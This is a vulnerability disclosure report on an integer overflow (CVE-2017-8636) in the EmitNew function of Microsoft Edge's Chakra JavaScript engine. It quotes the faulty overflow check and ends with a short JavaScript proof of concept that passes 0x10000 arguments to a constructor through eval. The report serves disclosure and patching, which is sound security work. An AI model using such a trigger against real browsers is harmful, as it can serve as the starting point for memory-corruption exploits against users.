Microsoft Edge: Chakra: Integer overflow in EmitNew CVE-2017-8636 The bytecode generator uses the "EmitNew" function to handle new operators. Here's the code how the function checks for integer overflow. void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo) { Js::ArgSlot argCount = pnode->sxCall.argCount; argCount++; // include "this" BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs); Assert(argCount == tmpCount); if (argCount != (Js::ArgSlot)argCount) { Js::Throw::OutOfMemory(); } ... } "Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all. PoC: let args = new Array(0x10000); args = args.fill(0x1234).join(', '); eval('new Array(' + args + ')'); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt